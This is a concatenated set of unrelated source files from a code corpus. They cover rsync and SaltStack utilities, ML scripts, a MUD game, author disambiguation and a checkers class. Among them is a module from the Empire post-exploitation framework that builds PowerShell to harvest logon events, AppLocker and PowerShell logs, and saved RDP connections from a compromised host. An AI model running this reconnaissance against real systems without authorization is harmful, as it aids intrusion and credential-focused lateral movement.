('{} = {}'.format(key, some_dict[key]))\n\n @staticmethod\n def print_client(clientlist):\n for item in Utility.gen(clientlist):\n item.self_print()\n\n @staticmethod\n def port_to_keys(keys_list, port):\n \"\"\" Add '-p port' to a -e params, if port exist \"\"\"\n if (port):\n index = 0\n key_str = '-e \\'ssh -p {}\\''.format(port)\n for item in Utility.gen(keys_list):\n if (item.startswith('-e')):\n index = keys_list.index(item)\n keys_list[index] = key_str\n break\n if (not index):\n keys_list.append(key_str)\n\n return keys_list\n\n @staticmethod\n def rsync_all(data_dict):\n for item in Utility.gen(data_dict['client']):\n keys = list()\n keys.extend(data_dict['keys'])\n\n item.pinger()\n keys = Utility.port_to_keys(keys, item.port)\n item.rsync_cmd(keys, data_dict['host_files'])\n\n #########################Logger section#########################\n\n class rsynclog:\n '''\n Custom logger to store all rsync wrapper actions.\n '''\n\n @staticmethod\n def logger_init(some_str):\n ''' Initialise new logger '''\n import logging\n logger = logging.getLogger(some_str)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler('rsyncer.log')\n formatter = logging.Formatter('[%(asctime)s] - %(name)11s - %(levelname)6s : %(message)s',datefmt='%d-%m-%y %H:%M')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger\n\n @staticmethod\n def info_log(logger, infostr):\n ''' Log info message '''\n logger.info(infostr)\n\n @staticmethod\n def debug_log(logger, infostr):\n ''' Log debug message '''\n logger.debug(infostr)\n\n class helper:\n '''Helper object will raise help messages'''\n\n @staticmethod\n def usage_help():\n print('usage: '\n 'rsyncer.py [/dir file1 file2][-process][-e ssh][username:port@ip:/destination [-pass=PASS]][-PavSzq]\\n'\n 'Runs rsync application with input parameters. For more info go to main_help.')\n\n @staticmethod\n def main_help():\n print('All available keys:\\n'\n '-process If exists raise -process flag for rsync\\n'\n '-pass=[Password] Password for connection to remote host\\n'\n '-e [connection type] Connection type ssh or rsh\\n'\n '-P Analog rsync --partial --progress\\n'\n '-a Archive mode\\n'\n '-v Verbose input\\n'\n '-S Parse argument files\\n'\n '-z Compress data stream\\n'\n '-q Quiet input\\n'\n\n 'Single remoute host can be entered without [...] brackets.\\n'\n 'Multiple remoute hosts should be entered as list in [...] brackets.\\n '\n '\\n'\n '!!After [ and before ] brackets spaces are necessary!!\\n'\n '\\n'\n 'Example: \\n'\n 'rsyncer.py -Pa /dir file1 [ username1@remote1 -pass=123 username2@remote2 username3@remote3 -pass=qwe ]\\n'\n 'Valid separators between username and port are: comma, spot, colon (,.:)\\n'\n 'Examples: rsyncer.py /usr root@host\\n'\n ' rsyncer.py /usr/wildcard* file3.avi root,22@hostname:/junk')\n\n @staticmethod\n def connection_type_help():\n print('Something goes wrong. Try -e ssh, -e rsh or use help.')\n\n @staticmethod\n def multiple_host_help():\n print('Something goes wrong. Spaces are necessary after open and before closed brackets.\\n'\n 'For more information use help\\n'\n 'Example: [ username1@remote1 -pass=123 username2@remote2 username3@remote3 -pass=qwe ]')\n\n @staticmethod\n def random_help():\n print('Oops, something goes wrong. Try to use help.')\n","sub_path":"Rsyncer/utility_cls.py","file_name":"utility_cls.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"157315613","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'fuzc'\n\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSALT_MASTER = '192.168.253.1'\n\nFILE_SERVER = {\n 'http':'%s:8000' %SALT_MASTER.strip(),\n 'salt':SALT_MASTER\n}\n\nFILE_SERVER_BASE_PATH = '/salt/file_center' #存放客户端需要下载的文件\n\nFILE_STORE_PATH = \"%s/var/downloads/\" % BASE_DIR #客户端下载的文件存放目录\n\n#tmp config\nSALT_CLIENT_ID = 1\n\nMQ_CONN = {\n 'host':'192.168.253.1',\n 'port': 5672,\n}\n","sub_path":"saltstack/saltclient/conf/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"307704102","text":"from __future__ import print_function\n\nfrom builtins import object, str\nfrom typing import Dict\n\nfrom empire.server.core.module_models import EmpireModule\nfrom empire.server.utils.module_util import handle_error_message\n\n\nclass Module(object):\n @staticmethod\n def generate(\n main_menu,\n module: EmpireModule,\n params: Dict,\n obfuscate: bool = False,\n obfuscation_command: str = \"\",\n ):\n # read in the common module source code\n script, err = main_menu.modulesv2.get_module_source(\n module_name=module.script_path,\n obfuscate=obfuscate,\n obfuscate_command=obfuscation_command,\n )\n\n if err:\n return handle_error_message(err)\n\n script_end = \"\"\n outputf = params.get(\"OutputFunction\", \"Out-String\")\n\n for option, values in params.items():\n if option.lower() != \"agent\" and option.lower() != \"outputfunction\":\n if values and values != \"\":\n if option == \"4624\":\n script_end += \"$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;\"\n script_end += 'Write-Output \"Event ID 4624 (Logon):`n\";'\n script_end += \"Write-Output $Filtered4624.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"4648\":\n script_end += \"$SecurityLog = Get-EventLog -LogName Security; $Filtered4648 = Find-4648Logons $SecurityLog;\"\n script_end += 'Write-Output \"Event ID 4648 (Explicit Credential Logon):`n\";'\n script_end += \"Write-Output $Filtered4648.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"AppLocker\":\n script_end += \"$AppLockerLogs = Find-AppLockerLogs;\"\n script_end += 'Write-Output \"AppLocker Process Starts:`n\";'\n script_end += \"Write-Output $AppLockerLogs.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"PSLogs\":\n script_end += \"$PSLogs = Find-PSScriptsInPSAppLog;\"\n script_end += 'Write-Output \"PowerShell Script Executions:`n\";'\n script_end += \"Write-Output $PSLogs.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"SavedRDP\":\n script_end += \"$RdpClientData = Find-RDPClientConnections;\"\n script_end += 'Write-Output \"RDP Client Data:`n\";'\n script_end += \"Write-Output $RdpClientData.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n # if we get to this point, no switched were specified\n script_end += \"Get-ComputerDetails -Limit \" + str(params[\"Limit\"])\n if outputf == \"Out-String\":\n script_end += (\n \" -ToString | \"\n + '%{$_ + \"`n\"};\"`n'\n + str(module.name.split(\"/\")[-1])\n + ' completed!\"'\n )\n else:\n script_end += (\n f\" | {outputf} | \"\n + '%{$_ + \"`n\"};\"`n'\n + str(module.name.split(\"/\")[-1])\n + ' completed!\"'\n )\n\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n","sub_path":"empire/server/modules/powershell/situational_awareness/host/computerdetails.py","file_name":"computerdetails.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"428001088","text":"import os\nimport json\nimport numpy as np\nimport pickle as pkl\nfrom pathlib import Path\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA, TruncatedSVD, NMF, LatentDirichletAllocation\n\nclass Task1(object):\n def __init__(self, inputDir, k, vector_model, technique, out_dir=\"outputs\"):\n self.input_dir = os.path.abspath(inputDir)\n self.out_dir = os.path.join(out_dir, \"task1\")\n Path(self.out_dir).mkdir(parents=True, exist_ok=True)\n self.num_components = k\n self.vector_model = vector_model\n self.technique = technique\n self.file_vectors = []\n self.reduced_file_vectors = []\n self.output_filename = \"\"\n self.model = None\n self.word_indexes = self.get_word_indexes(\"all_words_idx.txt\")\n files = sorted([x.split(\".\")[0] for x in os.listdir(os.path.join(\"phase2_outputs\", \"task0a\")) if \".wrd\" in x])\n indices = list(range(0, len(files)))\n self.idx_file_map = dict(zip(indices, files))\n self.file_idx_map = dict(zip(files, indices))\n self.load_vectors()\n self.run_model()\n # self.write_outputs()\n self.write_task2_inputs()\n\n #Load vector index word mapping \n def get_word_indexes(self, indexFileName):\n tempIndexData = pkl.load(open(os.path.join(self.input_dir, indexFileName), 'rb'))\n return {tempIndexData[i]:i for i in tempIndexData} # reversing key/values\n \n #Load TF and TF-IDF vectors for each file\n def load_vectors(self):\n self.vector_file_prefix = \"tf_vectors_\" if self.vector_model==1 else \"tfidf_vectors_\"\n \n vectors = {}\n for fileName in os.listdir(self.input_dir):\n if(fileName.startswith(self.vector_file_prefix)):\n fileNumber = fileName.split('.')[0].split('_')[-1]\n with open(os.path.join(self.input_dir, fileName), 'r') as f:\n vectors[fileNumber] = json.loads(json.load(f))\n\n self.file_vectors = np.array([vectors[key] for key in sorted(vectors)])\n \n #Running feature reduction\n def run_model(self):\n #Choose model based on user option\n if self.technique==1:\n self.output_filename = \"pca_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = PCA(n_components=self.num_components)\n elif self.technique==2:\n self.output_filename = \"svd_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = TruncatedSVD(n_components=self.num_components)\n elif self.technique==3:\n self.output_filename = \"nmf_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = NMF(n_components=self.num_components, max_iter=500)\n else:\n self.output_filename = \"lda_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = LatentDirichletAllocation(n_components=self.num_components)\n\n # scaler = MinMaxScaler()\n # self.file_vectors = scaler.fit_transform(self.file_vectors)\n self.reduced_file_vectors = self.model.fit_transform(self.file_vectors)\n \n #Writing results as pairs \n def write_outputs(self):\n name = self.output_filename.split(\"_\")[0] + \"_{}_vectors.txt\".format(self.vector_model)\n json.dump(json.dumps(self.reduced_file_vectors.tolist()), open(os.path.join(self.out_dir, name), \"w\"))\n with open(os.path.join(self.out_dir, self.output_filename), \"w+\") as f:\n f.write(\"[\")\n for topic in self.model.components_:\n f.write(\"{\")\n for idx in np.argsort(topic)[::-1]:\n originalWord = self.word_indexes[idx]\n score = topic[idx]\n f.write(\"{}:{},\".format(originalWord, score))\n f.write('},\\n')\n f.write(\"]\")\n\n\n #Write reduced dimensional data\n def write_task2_inputs(self):\n name = self.output_filename.split(\"_\")[0] + \"_{}_vectors.txt\".format(self.vector_model)\n json.dump(json.dumps(self.reduced_file_vectors.tolist()), open(os.path.join(self.out_dir, name), \"w\"))\n\n\nif __name__==\"__main__\":\n inputDir = input(\"Enter the directory to use: \")\n numComponents = int(input(\"Enter number of components (k): \"))\n vectorModel = int(input(\"Enter vector model (1-TF, 2-TFIDF): \"))\n technique = int(input(\"Enter model to use (1-PCA, 2-SVD, 3-NMF, 4-LDA): \"))\n t1 = Task1(inputDir, numComponents, vectorModel, technique)","sub_path":"Phase-3/phase2/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325286904","text":"from ..xmlUtil import *\nfrom ..ActionEffect import ActionEffect\nfrom ..LangText import LangText\n\nclass DisplayNodeTextEffect(ActionEffect):\n\tdef __init__(self, xml = None):\n\t\tif xml != None:\n\t\t\t# this effect has type in the attributes, and nothing else.\n\t\t\tvalidateNoChildren(xml)\n\t\t\tvalidateAttributes(xml, ['type'], [])\n\t\t\tvalidateNoTail(xml)\n\t\t\tvalidateNoBody(xml)\n\t\n\tdef execute(self, character):\n\t\tcharacter.sendLangTextToController(character.getNodeLangText())\n\t","sub_path":"dirt/effects/DisplayNodeTextEffect.py","file_name":"DisplayNodeTextEffect.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"192489986","text":"import lib.utility as utility\nfrom lib.interpreters.command import Command\nfrom lib.interpreters.constants import Position, Range\nfrom comm import Yell\nimport lib.combat as combat\n\n\n\"\"\"\nCommand Attributes;\nattribute (default): description\n\naggro\t\t\t\t(False)\t\t\t\t: does it start combat?\ncanTarget\t\t\t(False)\t\t\t\t: can it take an automatic single target?\nrequireTarget\t\t(False)\t\t\t\t: does it require a target?\nuseInCombat\t\t\t(False)\t\t\t\t: can you use it in combat?\nuseWhileJustDied\t(True)\t\t\t\t: can you use it immediately after dying?\ntargetSelf\t\t\t(True)\t\t\t\t: can you target yourself?\nRange\t\t\t\t(Range.room)\t\t: for skills that canTarget, what is the range of potential targets?\nminPosition\t\t\t(Position.standing)\t: what is the minimum position as defined in constants.py?\n\"\"\"\n\n\nclass Flee(Command):\n\tdef __init__(self, game):\n\t\tsuper(Flee, self).__init__(game, 'flee')\n\t\tself.minPosition = Position.fighting\n\t\tself.useInCombat = True\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\t\taggro = sender.combat\n\n\t\taggro.sendToClient('{name} has fled!'.format(name=sender.getName(aggro)))\n\t\tsender.sendToClient('You flee from combat!')\n\t\tsender.setLag(3)\n\t\tsender.combat = None\n\t\tsender.position = Position.standing\n\t\tif aggro.combat == sender:\n\t\t\taggro.combat = None\n\t\t\taggro.position = Position.standing\n\n\nclass Kill(Command):\n\tdef __init__(self, game):\n\t\tsuper(Kill, self).__init__(game, 'kill')\n\t\tself.canTarget = True\n\t\tself.requireTarget = True\n\t\tself.targetSelf = False\n\t\tself.useWhileJustDied = False\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\t\ttarget = config['target']\n\n\t\tsender.combat = target\n\t\tsender.position = Position.fighting\n\t\tsender.setLag(3)\n\t\tif target.combat is None:\n\t\t\ttarget.combat = sender\n\t\t\ttarget.position = Position.fighting\n\t\t\t# if target.client:\n\t\t\tyell = Yell(self.game)\n\t\t\tyell.execute(['Help! I am being attacked by {sender}!'.format(sender=sender.getName())], {'sender': target})\n\t\t\t# sender does one full round against target\n\t\t\tb2, target = combat.doCombat(sender)\n\n\t\t\tsender.sendToBuffer(b2['sender'].format(target=target.getName(sender)))\n\t\t\ttarget.sendToBuffer(b2['target'].format(name=sender.getName(target)))\n\t\t\tsender.game.sendToBufferCondition(\n\t\t\t\t(lambda a: a.room == sender.room and a is not sender and a is not target), b2['room'], [sender, target])\n\n\t\t\tfor mobile in self.game.mobiles:\n\t\t\t\tif mobile.combatBuffer:\n\t\t\t\t\tmobile.appendEnemyConditionToBuffer()\n\t\t\t\t\tmobile.sendToClient(mobile.combatBuffer)\n\t\t\t\t\tmobile.clearBuffer()\n\n\nclass North(Command):\n\tdef __init__(self, game):\n\t\tsuper(North, self).__init__(game, 'north')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'north', sender)\n\n\nclass South(Command):\n\tdef __init__(self, game):\n\t\tsuper(South, self).__init__(game, 'south')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'south', sender)\n\n\nclass East(Command):\n\tdef __init__(self, game):\n\t\tsuper(East, self).__init__(game, 'east')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'east', sender)\n\n\nclass West(Command):\n\tdef __init__(self, game):\n\t\tsuper(West, self).__init__(game, 'west')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'west', sender)\n\n\nclass Up(Command):\n\tdef __init__(self, game):\n\t\tsuper(Up, self).__init__(game, 'up')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'up', sender)\n\n\nclass Down(Command):\n\tdef __init__(self, game):\n\t\tsuper(Down, self).__init__(game, 'up')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'down', sender)\n\n\ndef move(game, direction, sender):\n\tnewRoom = next((exit.destination for exit in sender.room.exits if exit.key == direction), None)\n\tif newRoom:\n\t\toldRoom = sender.room\n\t\tsender.room = newRoom\n\t\tif not sender.isAffectedBy('sneak'):\n\t\t\tgame.sendCondition(\n\t\t\t\t(lambda a: a.room == oldRoom and a is not sender), '{{0}} leaves {direction}.'.format(direction=direction), [sender])\n\t\tbuf = 'You leave {direction}.'.format(name=sender.name, oldRoom=sender.room.name, newRoom=newRoom.name, direction=direction)\n\t\tsender.sendToClient(buf)\n\t\tif not sender.isAffectedBy('sneak'):\n\t\t\tgame.sendCondition((lambda a: a.room == newRoom and a is not sender), '{0} has arrived.', [sender])\n\t\tsender.setLag(1)\n\telse:\n\t\tsender.sendToClient('You can\\'t go that way.'.format(name=sender.name, oldRoom=sender.room.name, direction=direction))\n\ncommandList = [North, South, East, West, Up, Down, Kill, Flee]\n","sub_path":"lib/interpreters/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321535749","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thur Dec 14 22:24:32 2017\n@description:\nAuthor disambiguation use the name and the affiliation of authors.\n\n@author: Lanry Fan\n\"\"\"\n\nimport pymysql\n\ndb=pymysql.connect('localhost','user','psw','dbname')\n'''\n#Step-1:Initial [aid_raw2] use [aid_raw]\ncursor_init=db.cursor()\nsql_init='update author_init set aid_raw2=aid_raw'\ntry:\n cursor_init.execute(sql_init)\n db.commit()\nexcept Exception as e0:\n print('e0:',e0)\n db.rollback()\n'''\n#step-2:Get lname list from [author_init]\ncursor=db.cursor()\nsql='select count(xuhao),lname from author_init group by lname'\n#用[fname,mname,fname_initial,mname_initial,affiliation]精确匹配\ndata=[]\ncounter=0\ntry:\n cursor.execute(sql)\n rs1=cursor.fetchall()\n for row in rs1:\n print('正在处理第',counter+1,'条姓名数据...')\n number=row[0]\n lname=row[1]\n #Step-3:Get the name information list use the lname\n cursor_disab=db.cursor()\n sql_disab='select xuhao,aid_raw2,fname,mname,fname_initial,mname_initial,\\\n affiliation from author_init\\\n where lname=\"%s\"' %(lname)\n try:\n cursor_disab.execute(sql_disab)\n rs2=cursor_disab.fetchall()\n lname=lname.replace('||','')\n data_disab=[]\n xuhao=0;aid=0;fname='';mname=''\n fname_ini='';mname_ini=''\n affiliation=''\n for row2 in rs2:\n xuhao=row2[0]\n aid=row2[1]\n fname=row2[2]\n mname=row2[3]\n fname_ini=row2[4]\n mname_ini=row2[5]\n affiliation=row2[6]\n if fname is None:\n fname=''\n if mname is None:\n mname=''\n if fname_ini is None:\n fname_ini=''\n if mname_ini is None:\n mname_ini=''\n if affiliation is None:\n affiliation=''\n removestr=['||','/','\\\\','[',']','\"',\"'\"]\n for rmstr in removestr:\n fname=fname.replace(rmstr,'')\n mname=mname.replace(rmstr,'')\n fname_ini=fname_ini.replace(rmstr,'')\n mname_ini=mname_ini.replace(rmstr,'')\n fname=fname.strip()\n mname=mname.strip()\n fname_ini=fname_ini.strip()\n mname_ini=mname_ini.strip()\n affiliation=affiliation.replace('.','').replace('&',' ')\n affiliation=affiliation.replace('||',' ').strip()\n affiliation=' '.join(affiliation.split())\n affiliation=affiliation.lower()\n data_disab.append([xuhao,aid,fname,mname,fname_ini,mname_ini,affiliation])\n length=len(data_disab)\n #Step-4:Author disambiguation\n #More than one record\n if length>1:\n for i in range(length-1):\n for j in range(i+1,length):\n #Only if the two have different aid,then decide disambiguation\n if data_disab[i][1]!=data_disab[j][1]:\n #If the two both have the [fname]\n if data_disab[i][2]!='' and data_disab[j][2]!='':\n #If the two both have the [mname],use[fname,mname]\n if data_disab[i][3]!='' and data_disab[j][3]!='':\n #If two [fname,mname] are the same\n if data_disab[i][2]==data_disab[j][2] and data_disab[i][3]==data_disab[j][3]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [mname],use[fname]\n else:\n #If two [fname] are the same\n if data_disab[i][2]==data_disab[j][2]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [fname]\n else:\n #If the two both have the [fname_ini]\n if data_disab[i][4]!='' and data_disab[j][4]!='':\n #If the two both have the [mname_ini],use[fname_ini,mname_ini]\n if data_disab[i][5]!='' and data_disab[j][5]!='':\n #If two [fname_ini,mname_ini] are the same\n if data_disab[i][4]==data_disab[j][4] and data_disab[i][5]==data_disab[j][5]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [mname_ini],use[fname_ini]\n else:\n #If two [fname_ini] are the same\n if data_disab[i][4]==data_disab[j][4]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [fname_ini],decide them as two individual authors\n else:\n pass \n for row3 in data_disab:\n data.append([row3[0],row3[1],row3[2],row3[3],row3[4],row3[5],row3[6]])\n #Only one record\n else:\n #data.append([xuhao,aid,fname,mname,fname_ini,mname_ini,affiliation])\n pass\n except Exception as e1:\n print('e1:',e1)\n counter+=1\nexcept Exception as e:\n print('e:',e)\n\nprint('数据处理完成,等待写入数据库...')\nlength_data=len(data)\ncounter1=0\ntry:\n for row in data:\n cursor_update=db.cursor()\n sql_update='update author_init set aid_raw2=%d\\\n where xuhao=%d' % (row[1],row[0])\n try:\n print('共',length_data,'条记录,正在插入第',counter1+1,'条记录...')\n cursor_update.execute(sql_update)\n db.commit()\n except Exception as e2:\n db.rollback()\n print('e2:',e2)\n counter1+=1\nexcept Exception as e0:\n print('e0:',e0)\n\nprint('第三轮匹配完成!')\ndb.close()\n","sub_path":"Author disambiguation/author_disambiguation3.py","file_name":"author_disambiguation3.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509734858","text":"print(\"loading...\")\n\nimport random\n\nverb = (\"Tickles\", \"Eats\", \"Munches\", \"Punches\", \"Twists\", \"Shoots\", \"Beats\", \"Bends\", \"Bites\", \"Blows\", \"Breaks\", \"Builds\", \"Burns\", \"Catches\", \"Cuts\", \"Digs\", \"Dive\", \"Draws\", \"Dreams\", \"Feels\", \"Fights\", \"Freezes\", \"Grows\", \"Hangs\", \"Hears\", \"Hides\", \"Hurts\", \"Throws\")\nnoun = (\"School\", \"Face\", \"Arm\", \"Mouth\", \"Head\", \"Nose\", \"Foot\", \"People\", \"History\", \"Art\", \"World\", \"Map\", \"Family\", \"Government\", \"Health\", \"System\", \"Computer\", \"Music\", \"Person\", \"Method\", \"Food\", \"Bird\", \"Literature\", \"Problem\", \"Software\", \"Knowledge\", \"Brain\", \"Economy\", \"Oven\", \"Friends\")\n\ndef generate():\n return \"That really \"+random.choice(verb)+\" my \"+random.choice(noun)+\".\"\ndef generator():\n i = (input())\n\n if i==\"generate\":\n print(generate())\n elif i==\"lmao\":\n print(\"I know right im so random\")\n\n if i!=\"bye\":\n generator()\n else:\n print(\"Bye!\")\n\n\ndef generateList(amt):\n loop = 0\n while loop <= amt:\n print(str(loop)+\": \"+generate())\n loop += 1\n\nprint(\"done!\")\nprint(\"run generator() to start the generator, then type 'generate' to get a sentence. while in generate mode, type 'bye' to leave that mode. to generate a list exit generate mode if you're in it, then type generateList() with the amount you want inside the parentheses\")\n","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592895046","text":"import pygame\nfrom game_object import GameObject\n\n\nclass Player_checkers(GameObject):\n\n def __init__(self, x, y, r, color, check_type=\"ordinary\"):\n GameObject.__init__(self, x - r, y - r, r * 2, r * 2)\n self.radius = r\n self.diameter = r * 2\n self.color = color\n self.checkers_type = check_type\n\n def draw(self, surface):\n pygame.draw.circle(surface, self.color, self.center, self.radius)\n","sub_path":"Player_checkers.py","file_name":"Player_checkers.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238276276","text":"from model.PNNet import Res_Generator as Generator\nfrom model.DC_descriminator import Discriminator as Discriminator\nfrom lib.dataset import Dataset, Person\nimport lib.move_util as move\nimport lib.data_generator as dg\nimport lib.prework as pre\nfrom model.metrics import ssim as ssim\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport cv2\nimport numpy as np\nimport numpy.random as rand\nimport pickle\nimport json\nimport os\n\ndef print_out():\n src_dir = '/home/dongkai/pzq/data/market-morph/'\n dst_dir = '/home/dongkai/pzq/data/market-refine/'\n pose_dir = '/home/dongkai/pzq/data/market-pose-map/'\n tgt_mask_dir = '/home/dongkai/pzq/data/market-mask/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n network = Generator(64, 6).cuda()\n network.load_state_dict(torch.load('/home/dongkai/pzq/MVHS/base_model/G.pkl'))\n for param in network.parameters():\n param.requires_grad = False\n\n for i, image_name in enumerate(image_list):\n input = np.zeros((1, 4, 128, 64))\n img = np.transpose(cv2.imread(src_dir + image_name) / 255, (2, 0, 1))\n img_name = image_name[:-5] + '.jpg'\n pose = cv2.imread(pose_dir + img_name, 0) / 255\n mask = cv2.imread(tgt_mask_dir + img_name, 0) / 255\n tgt_img = np.transpose(cv2.imread(tgt_dir + img_name) / 255, (2, 0, 1))\n img = img * mask + tgt_img * (1 - mask)\n\n input[0, :3, :, :] = img\n input[0, 3, :, :] = pose\n input = torch.tensor(input).float().cuda()\n out = network(input)\n out = (np.array(out.detach().cpu()) * 255).astype(np.uint8)\n out = np.transpose(out[0], (1, 2, 0))\n cv2.imwrite(dst_dir + image_name, out)\n\n if i % 200 == 0:\n print(i)\n\ndef compute_ave_ssim():\n src_dir = '/home/dongkai/pzq/data/market-refine/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n image_list = sorted(image_list, key=lambda x:x)\n total_ssim = 0\n num = 2000\n test_list = np.arange(40000, 40000 + num)\n np.random.shuffle(test_list)\n\n img0 = np.zeros((num, 3, 128, 64))\n img1 = np.zeros((num, 3, 128, 64))\n for i in range(num):\n image_name = image_list[test_list[i]]\n img0[i] = np.transpose(cv2.imread(src_dir + image_name) / 255, (2, 0, 1))\n img1[i] = np.transpose(cv2.imread(tgt_dir + image_name[:-5] + '.jpg') / 255, (2, 0, 1))\n \n img0 = torch.tensor(img0).cuda()\n img1 = torch.tensor(img1).cuda()\n\n print('Start')\n\n for j in range(int(num / 2000)):\n total_ssim += ssim(img1[j*2000:(j+1)*2000], img0[j*2000:(j+1)*2000])\n\n print(total_ssim / (num / 2000))\n\n\ndef compute_max_ssim():\n src_dir = '/home/dongkai/pzq/data/market-refine/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n image_list = sorted(image_list, key=lambda x:x)\n total_ssim = 0\n num = 1000\n test_list = np.arange(20000, 20000 + num)\n np.random.shuffle(test_list)\n\n \n for i in range(num):\n img0 = np.zeros((2, 3, 128, 64))\n img1 = np.zeros((1, 3, 128, 64))\n image_name = image_list[test_list[i]][:-5]\n img1[0] = np.transpose(cv2.imread(tgt_dir + image_name + '.jpg') / 255, (2, 0, 1))\n for j in range(2):\n img_name = image_name + str(j) + '.jpg'\n img0[j, :, :, :] = np.transpose(cv2.imread(src_dir + img_name) / 255, (2, 0, 1))\n\n img1 = torch.tensor(img1).cuda().float()\n img0 = torch.tensor(img0).cuda().float()\n \n ssim0 = ssim(img1, img0[0:1, :, :, :])\n ssim1 = ssim(img1, img0[1:, :, :, :])\n total_ssim += torch.max(ssim0, ssim1)\n\n total_ssim = total_ssim / num\n\n print(total_ssim)\n\n\n\nif __name__ == '__main__':\n # print_out()\n compute_max_ssim() \n ","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127627052","text":"# -*- coding:utf-8 -*-\nimport urllib\nimport urllib.request\nimport urllib.parse\nimport requests\nimport execjs #库 PyExecJS\nimport re\nfrom wp_spider.translate.youdao import youdao\n\nclass translate_google():\n def __init__(self,word_limit=1000, 